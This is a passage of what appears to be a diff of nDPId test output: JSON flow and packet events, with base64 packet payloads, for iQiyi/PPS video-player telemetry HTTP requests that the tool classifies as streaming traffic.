{"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00940{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":424,"pkt_l4_len":390,"ts_msec":1467353139662,"pkt":"TF4M6gNlABxCjnAxCABFAAGaA59AAIAG6LXAqHMIymwO7MUmAFBtzkRVA7NFyFAYAQQzoQAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmYT0zNCZjdD1vbmNsaWNrJnR5cGU9cGMmYXM9JmNsdD1wY19wbGF5X3BsYXllcl9jbGljayZtdj01LjIuMTUuMjI0MCZwdT0mcm49MEZFMTcyRUM0NEM0NEI4NkFFRURFNTRBQTAwNTQxQzQ1NzQwNiZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9Mi4wLjEwMi4zMDE0NyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="}
-00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}}
 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1467353139771,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"ts_msec":1467353139771,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0y0pAADMGbvDKbA7swKhzCABQxSYDs0XIbc5Fx1AYAB\/3XQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="}
 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1467353139779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353139779,"pkt":"ABxCjnAxTF4M6gNlCABFAAC58h9AADMGSCfKbA7bwKhzCABQxSVwL3Su+7knHVAYADbM\/QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":952,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":952,"pkt_l4_len":918,"ts_msec":1467353139819,"pkt":"TF4M6gNlABxCjnAxCABFAAOqA7FAAIAG5pPAqHMIymwO7MUnAFCB65R9kZemalAYQTdERQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9MXx8NzEwMDAwMDF8fDUwMDAwMDA4NTg4NzR8fDUwMDAwMDA5Mjc1NTh8fHJvbGwmYXM9JmF2PTQuMTAuMDA0JmI9MTgwOTMyMzAxJmM9MzEmY3Q9JmQ9MjE3NSZkaT0mZHA9JmU9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPSZvaT0mcD10JnBwPSZyYz0tMSZyZD05MiZyaT0mcz0xNDY3MzUzMTM4MDQzJnNoPSZzcT0mc3c9JnQ9cyZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="}
-01269{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01295{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1467353139866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353139866,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5KWZAADMGENDKbA7swKhzCABQxSeRl6ZqgeuX\/1AYACHEyQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1100,"pkt_l4_len":1066,"ts_msec":1467353140628,"pkt":"TF4M6gNlABxCjnAxCABFAAQ+A+YAAIAGJdrAqHMIymwO3cUqAFDSWIZQbAIVvVAYKACmwAAAR0VUIC9iP2MxPTYmczE9MSZtYWNpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZjaGFubmVsaWQ9MDAwJm51PSZlPTEzNTI1Mjgmc2U9MTI1MzgxMSZyPTUwMDQ5NDYwMCZhZHVpZD1kMDdkZmQzMGYwZWU0ZTQ4YmJjYWYxMjA4Yzc1ODQ3MSZjdG09MTM3NTIxMSZwbGF5c291cmNlPTAwMTAwNDAwMCZ2aWQ9NTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEmYWxidW1pZD01MDA0OTQ2MDAmcmE9MiZ0ZD0yMjY1MiZzdWNjZXNzaW9uPTQmdHlwZT0xJnZmcm09My0wMDEwMDQwMDAtY19jb3JnaS0wJmJ1Y2tldD1jX2NvcmdpX21haW4mcmF0cD0xJnBsYXltb2RlPTEmaHU9LTEmaHQ9MCZhcD0wJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZ2ZT0xMzUyNTI4JnBmPTIwMSZwPTExJnAxPTExNCZwMj0xMDExJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9JnY9Mi4wLjEwMi4zMDE0NyZkZT1hMGVlNzdhNTYzODg5N2JlYmZkODU1NWIzMjcwYmVmNiZtdj01LjIuMTUuMjI0MCZrdj0xMC4wLjAuMjkzJnNvdXJjZTE9bWluaXBsYXllciZzb3VyY2UyPW1pbmlwbGF5ZXImc291cmNlMz0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUlZTUlOTklYTgmc291cmNlND0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUmcGxheV9zb3VyY2U9MSZvcHQ9MCZjbHQ9aG9tZWRsJnNjZW5lPTEmcm49MDAwMDAwMDE0NjczNTMxNDAgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMDsgQ0lCQTsgQWxleGEgVG9vbGJhcjsgWnVuZSA0LjcpDQpIb3N0OiBtc2cuaXFpeWkuY29tDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiB0YnZlcj1hbHhpLTkuMzk7IGFpZD1kbWVrYzFhUEMzMDA4cA0KDQo="}
-01606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}}
+01632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7440000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":941,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":941,"pkt_l4_len":907,"ts_msec":1467353140655,"pkt":"TF4M6gNlABxCjnAxCABFAAOfA+lAAIAG5mbAqHMIymwO7MUrAFDgGmOz15qFMlAYQTe3tgAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjoxfDImYXY9NC4xMC4wMDQmYj0yMDQwNzY3MDEmYz02JmN0PTUwMDAwMDA5MjY3OTUmZD0xNTgmZGk9JmRwPTcxMDAwMDAxJmU9NTEyYWI3N2RlN2Y2N2Q0OWYyNGQzNTExNzc4MjIwZDAmZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPTUwMDAwMDA4NTYzNDQmb2k9JnA9YSZwcD0mcmM9JnJkPSZyaT0mcz0xNDY3MzUzMTM5MDU3JnNoPSZzcT0mc3c9JnQ9c3AmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NTAwNDk0NjAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="}
-01258{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:2:1|2&av=4.10.004&b=204076701&c=6&ct=5000000926795&d=158&di=&dp=71000001&e=512ab77de7f67d49f24d3511778220d0&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000856344&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353139057&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=500494600&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01284{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7440000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 